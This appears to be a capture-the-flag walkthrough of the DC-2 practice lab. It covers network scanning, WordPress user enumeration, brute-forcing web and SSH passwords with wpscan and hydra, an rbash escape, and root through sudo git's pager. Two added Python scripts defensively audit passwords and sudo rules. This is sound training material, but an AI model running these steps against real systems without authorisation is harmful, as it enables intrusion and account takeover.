Lluna's Pure land.


DC-2

0x00. Official description

Much like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.

As with the original DC-1, it’s designed with beginners in mind.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

Just like with DC-1, there are five flags including the final flag.

And again, just like with DC-1, the flags are important for beginners, but not so important for those who have experience.

In short, the only flag that really counts, is the final flag.

For beginners, Google is your friend. Well, apart from all the privacy concerns etc etc.

I haven’t explored all the ways to achieve root, as I scrapped the previous version I had been working on, and started completely fresh apart from the base OS install.

0x01. Host discovery with nmap

.1 is the gateway, .2 is the host machine and .6 is Kali, so .4 must be our target.

root@JIYE:~/tmp/DC2# nmap -sP 192.168.1.0/24 -oN nmap.sP
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-20 21:59 EDT
Nmap scan report for 192.168.1.1
Host is up (0.0018s latency).
MAC Address: 68:D1:BA:1F:FD:48 (Shenzhen Youhua Technology)
Nmap scan report for 192.168.1.2
Host is up (0.00043s latency).
MAC Address: 50:5B:C2:8C:BE:A5 (Liteon Technology)
Nmap scan report for 192.168.1.4
Host is up (0.00029s latency).
MAC Address: 00:0C:29:83:64:3E (VMware)
Nmap scan report for 192.168.1.6
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.08 seconds
root@JIYE:~/tmp/DC2#

0x02. Continue with an nmap service and port scan

Ports 80 and 7744 are open, and 7744 is SSH.

root@JIYE:~/tmp/DC2# nmap -A 192.168.1.4 -p 1-65535 -oN nmap.A
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-20 22:05 EDT
Nmap scan report for 192.168.1.4
Host is up (0.00048s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Did not follow redirect to http://dc-2/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey:
| 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
| 2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
| 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_ 256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
MAC Address: 00:0C:29:83:64:3E (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.48 ms 192.168.1.4

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.20 seconds
root@JIYE:~/tmp/DC2#

0x03. Port 80 is open, so browse to it

It redirects to http://dc-2/, which cannot be resolved.

0x04. Edit the hosts file for local resolution

1. Add a line

192.168.1.4        dc-2

2. Visit the site again

3. The site's CMS is WordPress, and we also get flag1 together with some further hints

0x05. Run cewl

cewl crawls the given URL and generates a custom password wordlist from the words it finds.

root@JIYE:~/tmp/DC2# cewl dc-2 > pwd.dict
root@JIYE:~/tmp/DC2# wc -l pwd.dict
239 pwd.dict
root@JIYE:~/tmp/DC2#

0x06. Directory scanning

Since this is a web application, run a directory scan. msf is used here; dirb or gobuster work as well.

msf5 > use auxiliary/scanner/http/dir_scanner 
msf5 auxiliary(scanner/http/dir_scanner) > options

Module options (auxiliary/scanner/http/dir_scanner):

Name Current Setting Required Description
---- --------------- -------- -----------
DICTIONARY /usr/share/metasploit-framework/data/wmap/wmap_dirs.txt no Path of word dictionary to use
PATH / yes The path to identify files
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host

msf5 auxiliary(scanner/http/dir_scanner) > set rhosts 192.168.1.4
rhosts => 192.168.1.4
msf5 auxiliary(scanner/http/dir_scanner) > set threads 50
threads => 50
msf5 auxiliary(scanner/http/dir_scanner) > run

[*] Detecting error code
[*] Using code '404' as not found for 192.168.1.4
[+] Found http://192.168.1.4:80/icons/ 404 (192.168.1.4)
[+] Found http://192.168.1.4:80/wp-includes/ 404 (192.168.1.4)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The wp-includes directory is found. Visiting it shows a directory listing, but nothing useful, so dirb is still needed.

dirb finds wp-admin; try opening it.

root@JIYE:~/tmp/DC2# dirb http://dc-2

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Fri Aug 21 01:08:03 2020
URL_BASE: http://dc-2/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://dc-2/ ----
+ http://dc-2/index.php (CODE:301|SIZE:0)
+ http://dc-2/server-status (CODE:403|SIZE:292)
==> DIRECTORY: http://dc-2/wp-admin/
==> DIRECTORY: http://dc-2/wp-content/
==> DIRECTORY: http://dc-2/wp-includes/
+ http://dc-2/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://dc-2/wp-admin/ ----
+ http://dc-2/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://dc-2/wp-admin/css/
==> DIRECTORY: http://dc-2/wp-admin/images/
==> DIRECTORY: http://dc-2/wp-admin/includes/
+ http://dc-2/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://dc-2/wp-admin/js/
==> DIRECTORY: http://dc-2/wp-admin/maint/
==> DIRECTORY: http://dc-2/wp-admin/network/
==> DIRECTORY: http://dc-2/wp-admin/user/
---- Entering directory: http://dc-2/wp-content/ ----
+ http://dc-2/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://dc-2/wp-content/languages/
==> DIRECTORY: http://dc-2/wp-content/plugins/
==> DIRECTORY: http://dc-2/wp-content/themes/
---- Entering directory: http://dc-2/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://dc-2/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://dc-2/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://dc-2/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://dc-2/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://dc-2/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://dc-2/wp-admin/network/ ----
+ http://dc-2/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://dc-2/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: http://dc-2/wp-admin/user/ ----
+ http://dc-2/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://dc-2/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: http://dc-2/wp-content/languages/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://dc-2/wp-content/plugins/ ----
+ http://dc-2/wp-content/plugins/index.php (CODE:200|SIZE:0)
---- Entering directory: http://dc-2/wp-content/themes/ ----
+ http://dc-2/wp-content/themes/index.php (CODE:200|SIZE:0)
-----------------
END_TIME: Fri Aug 21 01:08:24 2020
DOWNLOADED: 32284 - FOUND: 12
root@JIYE:~/tmp/DC2#

It redirects to wp-login.php.

Since the CMS is WordPress, we can use wpscan.

0x07. wpscan

Enumerate the existing users.

root@JIYE:~/tmp/DC2# wpscan --url dc-2 -e u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.4
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://dc-2/ [192.168.1.4]
[+] Started: Fri Aug 21 00:37:54 2020

Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: Apache/2.4.10 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://dc-2/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
| Found By: Rss Generator (Passive Detection)
| - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
| - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>

[+] WordPress theme in use: twentyseventeen
| Location: http://dc-2/wp-content/themes/twentyseventeen/
| Last Updated: 2020-08-11T00:00:00.000Z
| Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 2.4
| Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Found By: Style (Passive Detection)
| - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <=============================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] jerry
| Found By: Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] tom
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Fri Aug 21 00:37:57 2020
[+] Requests Done: 27
[+] Cached Requests: 34
[+] Data Sent: 6.255 KB
[+] Data Received: 230.303 KB
[+] Memory used: 159.527 MB
[+] Elapsed time: 00:00:02
root@JIYE:~/tmp/DC2#

Three users are found: admin, jerry and tom.

The password wordlist was generated earlier; now create the username list.

root@JIYE:~/tmp/DC2# cat users.dict 
admin
jerry
tom
root@JIYE:~/tmp/DC2#

Brute force with wpscan; bp (Burp Suite) works too.

The passwords for jerry and tom are found.

root@JIYE:~/tmp/DC2# wpscan --url dc-2 -U users.dict -P pwd.dict 
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.4
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________


[!] Valid Combinations Found:
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Fri Aug 21 01:19:20 2020
[+] Requests Done: 702
[+] Cached Requests: 5
[+] Data Sent: 319.78 KB
[+] Data Received: 684.152 KB
[+] Memory used: 209.777 MB
[+] Elapsed time: 00:00:44
root@JIYE:~/tmp/DC2#
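Both recovered passwords are plain words from the site's own lorem ipsum text, which is exactly what cewl harvests. As an added example (not part of this write-up's tooling, cewl or DC-2), the Python below builds a cewl-style wordlist from page HTML and rejects passwords an attacker could derive from it; the HTML is constructed sample input, and the word rules (letters only, three or more characters) are assumed to match cewl's defaults.

```python
"""Reject passwords that a cewl-style crawl of the site itself would
guess. Added example for this write-up (not cewl or DC-2 code); the
HTML below is constructed sample input, and the word rules (letters
only, at least 3 characters) mirror cewl's defaults as an assumption."""
import re
from html.parser import HTMLParser

MIN_WORD_LEN = 3  # cewl's default minimum word length (assumption)


class _TextExtractor(HTMLParser):
    """Collect visible text, skipping <script> and <style> bodies."""

    def __init__(self):
        super().__init__()
        self._skip = 0
        self.chunks = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.chunks.append(data)


def site_wordlist(html, min_len=MIN_WORD_LEN):
    """Lower-cased set of words a cewl-style crawl of `html` would yield."""
    parser = _TextExtractor()
    parser.feed(html)
    words = re.findall(r"[A-Za-z]+", " ".join(parser.chunks))
    return {w.lower() for w in words if len(w) >= min_len}


def password_weaknesses(password, wordlist):
    """Reasons a password is guessable from the site wordlist: an exact
    hit, a site word with trailing digits/symbols, or two joined words."""
    reasons = []
    p = password.lower()
    if p in wordlist:
        reasons.append("exact word from site content")
    stem = re.sub(r"[^a-z]+$", "", p)
    if stem != p and stem in wordlist:
        reasons.append("site word plus trailing digits/symbols")
    for i in range(MIN_WORD_LEN, len(p) - MIN_WORD_LEN + 1):
        if p[:i] in wordlist and p[i:] in wordlist:
            reasons.append("two site words joined")
            break
    return reasons


# Constructed sample page: DC-2's theme text is lorem ipsum, so these
# words stand in for the 239 that cewl harvested from the real site.
SAMPLE_HTML = """<html><head><title>DC-2</title>
<style>body{color:#000}</style></head><body>
<h1>Lorem ipsum dolor sit amet, consectetur adipiscing elit.</h1>
<p>Cum sociis natoque penatibus et magnis dis parturient montes.</p>
<script>var x = "notaword";</script></body></html>"""

if __name__ == "__main__":
    words = site_wordlist(SAMPLE_HTML)
    for pw in ("adipiscing", "Parturient99!", "adipiscingelit", "Tr0ub4dor&3"):
        print(f"{pw!r}: {password_weaknesses(pw, words) or ['ok']}")
```

Run against a real crawl, the same check belongs in the password-change path of the application so that site vocabulary is refused before a wordlist attack ever sees it.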

First try logging into the site as tom; the login succeeds.

Browsing around manually turns up no flag. flag1 hinted that if you cannot find it you should log in as someone else, so log in as jerry next.

flag2 is found, along with another hint.

The hint wants us to find another entry point. SSH was found open earlier, so brute force SSH next.

0x08. Brute-forcing SSH

The password turns out to be the same as the web password, so what was I even brute-forcing for!

root@JIYE:~/tmp/DC2# hydra -L users.dict -P pwd.dict ssh://192.168.1.4 -s 7744 -f -vV -o hydra.ssh
......
......
[ATTEMPT] target 192.168.1.4 - login "tom" - pass "penatibus" - 683 of 720 [child 3] (0/3)
[ATTEMPT] target 192.168.1.4 - login "tom" - pass "magnis" - 684 of 720 [child 12] (0/3)
[ATTEMPT] target 192.168.1.4 - login "tom" - pass "dis" - 685 of 720 [child 13] (0/3)
[ATTEMPT] target 192.168.1.4 - login "tom" - pass "parturient" - 686 of 720 [child 8] (0/3)
[7744][ssh] host: 192.168.1.4 login: tom password: parturient
[STATUS] attack finished for 192.168.1.4 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-08-21 01:47:28
root@JIYE:~/tmp/DC2

0x09. SSH login

root@JIYE:~/tmp/DC2# ssh tom@192.168.1.4 -p 7744 
The authenticity of host '[192.168.1.4]:7744 ([192.168.1.4]:7744)' can't be established.
ECDSA key fingerprint is SHA256:ZbyT03GNDQgEmA5AMiTX2N685NTzZuOoyMDIA+DW1qU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.1.4]:7744' (ECDSA) to the list of known hosts.
tom@192.168.1.4's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
tom@DC-2:~$

flag3.txt is there, but trying to read it reveals an rbash restriction.

1
2
3
4
tom@DC-2:~$ ls
flag3.txt usr
tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found

0x10. rbash bypass

BASH_CMDS[a]=/bin/sh;a
/bin/bash
tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a
$ /bin/bash
tom@DC-2:~$ echo $0
/bin/bash
tom@DC-2:~$ ls
flag3.txt usr
tom@DC-2:~$ cat flag3.txt
bash: cat: command not found
tom@DC-2:~$

This time the error is `bash: cat: command not found`, so add the standard directories to PATH.

export PATH=$PATH:/bin
export PATH=$PATH:/usr/bin

Now flag3 can be read.

tom@DC-2:~$ export PATH=$PATH:/bin
tom@DC-2:~$ export PATH=$PATH:/usr/bin
tom@DC-2:~$ ls
flag3.txt usr
tom@DC-2:~$ cat flag3.txt
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
tom@DC-2:~$


The clue points to the jerry user.

Check /etc/passwd: jerry exists with /bin/bash as the shell, so the account can log in.

tom@DC-2:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Debian-exim:x:104:109::/var/spool/exim4:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
statd:x:106:65534::/var/lib/nfs:/bin/false
sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:108:114:MySQL Server,,,:/nonexistent:/bin/false
tom:x:1001:1001:Tom Cat,,,:/home/tom:/bin/rbash
jerry:x:1002:1002:Jerry Mouse,,,:/home/jerry:/bin/bash
tom@DC-2:~$

0x11. Logging in as jerry

Since tom's login password was the same as the web application password, try jerry's web password too.

Sure enough, it works.

tom@DC-2:~$ su jerry
Password:
jerry@DC-2:/home/tom$

In jerry's home directory we find flag4.

jerry@DC-2:/home/tom$ cd 
jerry@DC-2:~$ ls
flag4.txt
jerry@DC-2:~$ cat flag4.txt
Good to see that you've made it this far - but you're not home yet.

You still need to get the final flag (the only flag that really counts!!!).

No hints here - you're on your own now. :-)

Go on - git outta here!!!!

jerry@DC-2:~$


Trying to enter /root is denied.

jerry@DC-2:~$ cd /root
bash: cd: /root: Permission denied
jerry@DC-2:~$

Following the hint, use git for privilege escalation.

sudo -l shows that /usr/bin/git may be run through sudo as root, and without a password.

jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
(root) NOPASSWD: /usr/bin/git
jerry@DC-2:~$
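That single sudo rule is the whole privilege boundary on DC-2, so a defender wants to catch rules like it before an attacker does. The following Python audit is an added example (not part of DC-2, sudo or the author's tooling): it parses `sudo -l` output, flags root rules on binaries that can launch a pager, editor or shell (an assumed, non-exhaustive list), and proposes a sudoers line using the NOEXEC tag as the fix; the sample input is the `sudo -l` output captured above.

```python
"""Audit `sudo -l` output for root rules on binaries that can hand the
caller a shell (git's pager on DC-2 is one). Added example for this
write-up, not code from DC-2 or sudo; SHELL_CAPABLE is an assumed,
non-exhaustive list and the sample output is the one captured above."""
import re

# Programs that execute an arbitrary child (pager, editor or shell) when
# run; an unrestricted root rule on them is a rule on a shell. Assumed.
SHELL_CAPABLE = {"git", "less", "more", "man", "vi", "vim", "nano",
                 "find", "awk", "python", "python3", "perl", "bash", "sh"}

USER_RE = re.compile(r"^User (\S+) may run the following commands")
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>\S.*)$")


def parse_sudo_l(output):
    """Return (user, runas, tags, command) tuples from `sudo -l` text."""
    user, rules = None, []
    for line in output.splitlines():
        m_user = USER_RE.match(line)
        if m_user:
            user = m_user.group(1)
            continue
        m = RULE_RE.match(line) if user else None  # skip the Defaults block
        if not m:
            continue
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        for cmd in m.group("cmds").split(","):
            rules.append((user, m.group("runas").strip(), tags, cmd.strip()))
    return rules


def risky_rules(output):
    """Flag rules that run as root and let the binary spawn children."""
    findings = []
    for user, runas, tags, cmd in parse_sudo_l(output):
        if runas.split(":")[0].strip() not in ("root", "ALL"):
            continue  # not a root rule
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        if cmd != "ALL" and (binary not in SHELL_CAPABLE or "NOEXEC" in tags):
            continue  # cannot spawn children, or noexec already blocks them
        if cmd == "ALL":
            why, fix = "any command as root", "remove the rule or name specific commands"
        else:
            why = f"{binary} can launch a pager, editor or shell as root"
            fix = f"{user} ALL=({runas}) NOEXEC: {cmd}"  # proposed sudoers line
        findings.append({"user": user, "command": cmd,
                         "nopasswd": "NOPASSWD" in tags, "why": why, "fix": fix})
    return findings


# `sudo -l` output captured on DC-2 in the write-up above.
SUDO_L_OUTPUT = r"""Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
"""

if __name__ == "__main__":
    for finding in risky_rules(SUDO_L_OUTPUT):
        print(finding)
```

NOEXEC stops the granted command from executing further programs, so git can no longer hand off to a pager; the rule is still better removed if jerry does not need root git at all.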

Try sudo git; it can indeed be invoked.

jerry@DC-2:~$ sudo git
usage: git [--version] [--help] [-C <path>] [-c name=value]
[--exec-path[=<path>]] [--html-path] [--man-path] [--info-path]
[-p|--paginate|--no-pager] [--no-replace-objects] [--bare]
[--git-dir=<path>] [--work-tree=<path>] [--namespace=<name>]
<command> [<args>]

The most commonly used git commands are:
add Add file contents to the index
bisect Find by binary search the change that introduced a bug
branch List, create, or delete branches
checkout Checkout a branch or paths to the working tree
clone Clone a repository into a new directory
commit Record changes to the repository
diff Show changes between commits, commit and working tree, etc
fetch Download objects and refs from another repository
grep Print lines matching a pattern
init Create an empty Git repository or reinitialize an existing one
log Show commit logs
merge Join two or more development histories together
mv Move or rename a file, a directory, or a symlink
pull Fetch from and integrate with another repository or a local branch
push Update remote refs along with associated objects
rebase Forward-port local commits to the updated upstream head
reset Reset current HEAD to the specified state
rm Remove files from the working tree and from the index
show Show various types of objects
status Show the working tree status
tag Create, list, delete or verify a tag object signed with GPG

'git help -a' and 'git help -g' lists available subcommands and some
concept guides. See 'git help <command>' or 'git help <concept>'
to read about a specific subcommand or concept.
jerry@DC-2:~$

0x12. Privilege escalation

Force the help output into the interactive pager.

jerry@DC-2:~$ sudo git -p --help config
GIT-CONFIG(1) Git Manual GIT-CONFIG(1)



NAME
git-config - Get and set repository or global options

SYNOPSIS
git config [<file-option>] [type] [-z|--null] name [value [value_regex]]
git config [<file-option>] [type] --add name value
git config [<file-option>] [type] --replace-all name value [value_regex]
git config [<file-option>] [type] [-z|--null] --get name [value_regex]
git config [<file-option>] [type] [-z|--null] --get-all name [value_regex]
git config [<file-option>] [type] [-z|--null] --get-regexp name_regex [value_regex]
git config [<file-option>] [type] [-z|--null] --get-urlmatch name URL
git config [<file-option>] --unset name [value_regex]
git config [<file-option>] --unset-all name [value_regex]
git config [<file-option>] --rename-section old_name new_name
git config [<file-option>] --remove-section name
git config [<file-option>] [-z|--null] -l | --list
git config [<file-option>] --get-color name [default]
git config [<file-option>] -e | --edit


DESCRIPTION
You can query/set/replace/unset options with this command. The name is actually the section and the key separated by a dot, and the value will be escaped.

Multiple lines can be added to an option by using the --add option. If you want to update or unset an option which can occur on multiple lines, a POSIX regexp
value_regex needs to be given. Only the existing values that match the regexp are updated or unset. If you want to handle the lines that do not match the
regex, just prepend a single exclamation mark in front (see also the section called “EXAMPLES”).

The type specifier can be either --int or --bool, to make git config ensure that the variable(s) are of the given type and convert the value to the canonical
form (simple decimal number for int, a "true" or "false" string for bool), or --path, which does some path expansion (see --path below). If no type specifier
is passed, no checks or transformations are performed on the value.

When reading, the values are read from the system, global and repository local configuration files by default, and options --system, --global, --local and
:

Run !/bin/bash from the pager.

!/bin/bash
root@DC-2:/home/jerry# cd /root
root@DC-2:~# whoami
root
root@DC-2:~# id
uid=0(root) gid=0(root) groups=0(root)
root@DC-2:~# ls
final-flag.txt
root@DC-2:~# cat final-flag.txt
__ __ _ _ _ _
/ / /\ \ \___| | | __| | ___ _ __ ___ / \
\ \/ \/ / _ \ | | / _` |/ _ \| '_ \ / _ \/ /
\ /\ / __/ | | | (_| | (_) | | | | __/\_/
\/ \/ \___|_|_| \__,_|\___/|_| |_|\___\/


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.

root@DC-2:~#
------------- Short note, long regards. See you next time -------------